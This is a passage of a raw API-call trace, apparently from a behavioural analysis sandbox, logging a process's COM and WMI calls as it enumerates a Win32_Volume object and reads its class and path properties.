	[0172.650] IClientSecurity:QueryBlanket (in: This=0x1cc34790, pProxy=0x1cc34788, pAuthnSvc=0x1c68c8c0, pAuthzSvc=0x1c68c8bc, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8, pImpLevel=0x1c68c8d4, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0 | out: pAuthnSvc=0x1c68c8c0*=0xa, pAuthzSvc=0x1c68c8bc*=0x0, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8*=0x6, pImpLevel=0x1c68c8d4*=0x2, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0*=0x1) returned 0x0
	[0172.650] IUnknown:Release (This=0x1cc34790) returned 0x1
	[0172.650] IUnknown:QueryInterface (in: This=0x1cc34788, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c868 | out: ppvObject=0x1c68c868*=0x1b86e0e0) returned 0x0
	[0172.650] IUnknown:QueryInterface (in: This=0x1cc34788, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7f8 | out: ppvObject=0x1c68c7f8*=0x1cc34790) returned 0x0
	[0172.650] IClientSecurity:SetBlanket (This=0x1cc34790, pProxy=0x1cc34788, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0172.666] IUnknown:Release (This=0x1cc34790) returned 0x2
	[0172.666] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x1
	[0172.666] CoTaskMemFree (pv=0x1b8785c0) 
	[0172.666] IUnknown:QueryInterface (in: This=0x1cc34788, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c490 | out: ppvObject=0x1c68c490*=0x1b86e0e0) returned 0x0
	[0172.667] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c510 | out: ppvObject=0x1c68c510*=0x0) returned 0x80004002
	[0172.668] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c2a8 | out: ppvObject=0x1c68c2a8*=0x0) returned 0x80004002
	[0172.671] WbemLocator:IUnknown:AddRef (This=0x1b86e0e0) returned 0x3
	[0172.671] CoGetContextToken (in: pToken=0x1c68c160 | out: pToken=0x1c68c160) returned 0x0
	[0172.671] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c120 | out: ppvObject=0x1c68c120*=0x1b86dfc8) returned 0x0
	[0172.671] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86dfc8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c150 | out: pCid=0x1c68c150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.671] WbemLocator:IUnknown:Release (This=0x1b86dfc8) returned 0x3
	[0172.672] CoGetContextToken (in: pToken=0x1c68c130 | out: pToken=0x1c68c130) returned 0x0
	[0172.672] WbemLocator:IUnknown:AddRef (This=0x1b86e0e0) returned 0x4
	[0172.672] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c248 | out: ppvObject=0x1c68c248*=0x1b86e0b0) returned 0x0
	[0172.672] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x4
	[0172.672] WbemLocator:IRpcOptions:Query (in: This=0x1b86e0b0, pPrx=0x1b86e0e0, dwProperty=2, pdwValue=0x1c68c2b8 | out: pdwValue=0x1c68c2b8) returned 0x80004002
	[0172.672] WbemLocator:IUnknown:Release (This=0x1b86e0b0) returned 0x3
	[0172.672] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x2
	[0172.672] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0172.672] CoGetContextToken (in: pToken=0x1c68c570 | out: pToken=0x1c68c570) returned 0x0
	[0172.672] WbemLocator:IUnknown:AddRef (This=0x1b86e0e0) returned 0x3
	[0172.672] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x1c68c6b0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c690 | out: ppvObject=0x1c68c690*=0x1cc34788) returned 0x0
	[0172.672] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x3
	[0172.673] IUnknown:Release (This=0x1cc34788) returned 0x2
	[0172.673] IUnknown:Release (This=0x1cc34788) returned 0x1
	[0172.673] IUnknown:Release (This=0x1cc345f8) returned 0x2
	[0172.676] CoGetContextToken (in: pToken=0x1c68ca30 | out: pToken=0x1c68ca30) returned 0x0
	[0172.676] CoGetContextToken (in: pToken=0x1c68c970 | out: pToken=0x1c68c970) returned 0x0
	[0172.676] WbemLocator:IUnknown:AddRef (This=0x1b86e0e0) returned 0x2
	[0172.676] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x1c68cab0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68ca90 | out: ppvObject=0x1c68ca90*=0x1cc34788) returned 0x0
	[0172.676] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x2
	[0172.677] IUnknown:AddRef (This=0x1cc34788) returned 0x3
	[0172.677] IEnumWbemClassObject:Reset (This=0x1cc34788) returned 0x0
	[0172.683] IUnknown:Release (This=0x1cc34788) returned 0x2
	[0172.688] CoTaskMemAlloc (cb=0x8) returned 0x1b860d70
	[0172.689] IEnumWbemClassObject:Next (in: This=0x1cc34788, lTimeout=-1, uCount=0x1, apObjects=0x1b860d70, puReturned=0x1c68ccb8 | out: apObjects=0x1b860d70*=0x1cc34830, puReturned=0x1c68ccb8*=0x1) returned 0x0
	[0175.261] IUnknown:QueryInterface (in: This=0x1cc34830, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bfe0 | out: ppvObject=0x1c68bfe0*=0x1cc34830) returned 0x0
	[0175.261] IUnknown:QueryInterface (in: This=0x1cc34830, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c060 | out: ppvObject=0x1c68c060*=0x0) returned 0x80004002
	[0175.261] IUnknown:QueryInterface (in: This=0x1cc34830, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bdf8 | out: ppvObject=0x1c68bdf8*=0x0) returned 0x80004002
	[0175.262] IUnknown:AddRef (This=0x1cc34830) returned 0x3
	[0175.262] CoGetContextToken (in: pToken=0x1c68bcb0 | out: pToken=0x1c68bcb0) returned 0x0
	[0175.262] IUnknown:QueryInterface (in: This=0x1cc34830, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bc70 | out: ppvObject=0x1c68bc70*=0x1cc34838) returned 0x0
	[0175.262] IMarshal:GetUnmarshalClass (in: This=0x1cc34838, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bca0 | out: pCid=0x1c68bca0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0175.262] IUnknown:Release (This=0x1cc34838) returned 0x3
	[0175.262] CoGetContextToken (in: pToken=0x1c68bc80 | out: pToken=0x1c68bc80) returned 0x0
	[0175.262] IUnknown:AddRef (This=0x1cc34830) returned 0x4
	[0175.263] IUnknown:QueryInterface (in: This=0x1cc34830, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bd98 | out: ppvObject=0x1c68bd98*=0x0) returned 0x80004002
	[0175.263] IUnknown:Release (This=0x1cc34830) returned 0x3
	[0175.263] IUnknown:Release (This=0x1cc34830) returned 0x2
	[0175.263] CoGetContextToken (in: pToken=0x1c68c140 | out: pToken=0x1c68c140) returned 0x0
	[0175.263] CoGetContextToken (in: pToken=0x1c68c080 | out: pToken=0x1c68c080) returned 0x0
	[0175.263] IUnknown:AddRef (This=0x1cc34830) returned 0x3
	[0175.263] IUnknown:QueryInterface (in: This=0x1cc34830, riid=0x1c68c1c0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c1a0 | out: ppvObject=0x1c68c1a0*=0x1cc34830) returned 0x0
	[0175.263] IUnknown:Release (This=0x1cc34830) returned 0x3
	[0175.263] IUnknown:Release (This=0x1cc34830) returned 0x2
	[0175.264] IUnknown:Release (This=0x1cc34830) returned 0x1
	[0175.264] CoTaskMemFree (pv=0x1b860d70) 
	[0175.264] CoGetContextToken (in: pToken=0x1c68cac0 | out: pToken=0x1c68cac0) returned 0x0
	[0175.264] IUnknown:AddRef (This=0x1cc34830) returned 0x2
	[0175.270] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__GENUS", lFlags=0, pVal=0x1c68cc30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cc2c*=0, plFlavor=0x1c68cc28*=0 | out: pVal=0x1c68cc30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68cc2c*=3, plFlavor=0x1c68cc28*=64) returned 0x0
	[0175.276] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__PATH", lFlags=0, pVal=0x1c68cbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cbcc*=0, plFlavor=0x1c68cbc8*=0 | out: pVal=0x1c68cbd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c68cbcc*=8, plFlavor=0x1c68cbc8*=64) returned 0x0
	[0175.276] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0175.276] CoGetObjectContext (in: riid=0x1c68cb68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb60 | out: ppv=0x1c68cb60*=0x221868) returned 0x0
	[0175.276] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cb80 | out: pAptType=0x1c68cb80*=1) returned 0x0
	[0175.276] IUnknown:QueryInterface (in: This=0x221868, riid=0x2fcf310*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cc88 | out: ppvObject=0x1c68cc88*=0x0) returned 0x80004002
	[0175.277] IUnknown:Release (This=0x221868) returned 0x1
	[0175.277] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c1f0 | out: ppv=0x1c68c1f0*=0x1cc31720) returned 0x0
	[0175.277] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc31720, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf00 | out: ppvObject=0x1c68bf00*=0x0) returned 0x80004002
	[0175.277] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc31720, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bee8 | out: ppvObject=0x1c68bee8*=0x1cc37cf0) returned 0x0
	[0175.278] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc37cf0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bdf0 | out: ppvObject=0x1c68bdf0*=0x1cc37cf0) returned 0x0
	[0175.278] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc37cf0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68be70 | out: ppvObject=0x1c68be70*=0x0) returned 0x80004002
	[0175.278] WbemDefPath:IUnknown:AddRef (This=0x1cc37cf0) returned 0x3
	[0175.278] CoGetContextToken (in: pToken=0x1c68bac0 | out: pToken=0x1c68bac0) returned 0x0
	[0175.278] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc37cf0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68ba80 | out: ppvObject=0x1c68ba80*=0x1b869520) returned 0x0
	[0175.278] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b869520, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bab0 | out: pCid=0x1c68bab0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0175.278] WbemDefPath:IUnknown:Release (This=0x1b869520) returned 0x3
	[0175.278] CoGetContextToken (in: pToken=0x1c68ba90 | out: pToken=0x1c68ba90) returned 0x0
	[0175.278] WbemDefPath:IUnknown:AddRef (This=0x1cc37cf0) returned 0x4
	[0175.279] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc37cf0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bba8 | out: ppvObject=0x1c68bba8*=0x0) returned 0x80004002
	[0175.279] WbemDefPath:IUnknown:Release (This=0x1cc37cf0) returned 0x3
	[0175.279] WbemDefPath:IUnknown:Release (This=0x1cc37cf0) returned 0x2
	[0175.279] WbemDefPath:IUnknown:Release (This=0x1cc31720) returned 0x0
	[0175.279] WbemDefPath:IUnknown:Release (This=0x1cc37cf0) returned 0x1
	[0175.279] CoGetContextToken (in: pToken=0x1c68c7c0 | out: pToken=0x1c68c7c0) returned 0x0
	[0175.279] CoGetContextToken (in: pToken=0x1c68c700 | out: pToken=0x1c68c700) returned 0x0
	[0175.279] WbemDefPath:IUnknown:AddRef (This=0x1cc37cf0) returned 0x2
	[0175.279] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc37cf0, riid=0x1c68c840*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c820 | out: ppvObject=0x1c68c820*=0x1cc37cf0) returned 0x0
	[0175.279] WbemDefPath:IUnknown:Release (This=0x1cc37cf0) returned 0x2
	[0175.280] WbemDefPath:IUnknown:Release (This=0x1cc37cf0) returned 0x1
	[0175.280] CoGetContextToken (in: pToken=0x1c68c940 | out: pToken=0x1c68c940) returned 0x0
	[0175.280] CoGetContextToken (in: pToken=0x1c68c880 | out: pToken=0x1c68c880) returned 0x0
	[0175.280] WbemDefPath:IUnknown:AddRef (This=0x1cc37cf0) returned 0x2
	[0175.280] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc37cf0, riid=0x1c68c9c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9a0 | out: ppvObject=0x1c68c9a0*=0x1cc37cf0) returned 0x0
	[0175.280] WbemDefPath:IUnknown:Release (This=0x1cc37cf0) returned 0x2
	[0175.280] WbemDefPath:IUnknown:AddRef (This=0x1cc37cf0) returned 0x3
	[0175.280] WbemDefPath:IWbemPath:SetText (This=0x1cc37cf0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x0
	[0175.280] WbemDefPath:IUnknown:Release (This=0x1cc37cf0) returned 0x2
	[0175.280] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc21390, puCount=0x1c68cc00 | out: puCount=0x1c68cc00*=0x2) returned 0x0
	[0175.280] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cc00*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc00*=0x17, pszText=0x0) returned 0x0
	[0175.280] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cc00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.280] CoTaskMemAlloc (cb=0x8) returned 0x1b860d70
	[0175.280] IEnumWbemClassObject:Next (in: This=0x1cc34788, lTimeout=-1, uCount=0x1, apObjects=0x1b860d70, puReturned=0x1c68ccb8 | out: apObjects=0x1b860d70*=0x0, puReturned=0x1c68ccb8*=0x0) returned 0x1
	[0175.316] CoTaskMemFree (pv=0x1b860d70) 
	[0175.320] CoGetContextToken (in: pToken=0x1c68ca40 | out: pToken=0x1c68ca40) returned 0x0
	[0175.320] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x1
	[0175.320] IUnknown:Release (This=0x1cc34788) returned 0x0
	[0175.331] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc21390, puCount=0x1c68cd60 | out: puCount=0x1c68cd60*=0x2) returned 0x0
	[0175.331] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd60*=0x17, pszText=0x0) returned 0x0
	[0175.331] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.333] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd4c*=0, plFlavor=0x1c68cd48*=0 | out: pVal=0x1c68cd50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c68cd4c*=8, plFlavor=0x1c68cd48*=64) returned 0x0
	[0175.333] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0175.333] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64 | out: pVal=0x1c68cd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64) returned 0x0
	[0175.333] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0175.334] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc21390, puCount=0x1c68cd60 | out: puCount=0x1c68cd60*=0x2) returned 0x0
	[0175.334] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd60*=0x17, pszText=0x0) returned 0x0
	[0175.334] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.334] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__CLASS", lFlags=0, pVal=0x1c68cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd4c*=0, plFlavor=0x1c68cd48*=0 | out: pVal=0x1c68cd50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c68cd4c*=8, plFlavor=0x1c68cd48*=64) returned 0x0
	[0175.334] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0175.334] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__CLASS", lFlags=0, pVal=0x1c68cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64 | out: pVal=0x1c68cd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64) returned 0x0
	[0175.334] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0175.374] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc21390, puCount=0x1c68ccf0 | out: puCount=0x1c68ccf0*=0x2) returned 0x0
	[0175.374] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68ccf0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68ccf0*=0x17, pszText=0x0) returned 0x0
	[0175.374] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68ccf0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68ccf0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.374] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc21390, puCount=0x1c68ccf0 | out: puCount=0x1c68ccf0*=0x2) returned 0x0
	[0175.374] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68ccf0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68ccf0*=0x17, pszText=0x0) returned 0x0
	[0175.374] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68ccf0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68ccf0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.379] IWbemClassObject:GetNames (in: This=0x1cc34830, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c68cce8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c68cce0 | out: pNames=0x1c68cce0*="\x01ƀ\x08") returned 0x0
	[0175.379] SafeArrayGetDim (psa=0x1b876300) returned 0x1
	[0175.380] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__GENUS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68ccdc*=3, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0175.380] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__CLASS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0175.380] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0175.380] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_StorageVolume", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0175.388] SysStringLen (param_1="CIM_StorageVolume") returned 0x11
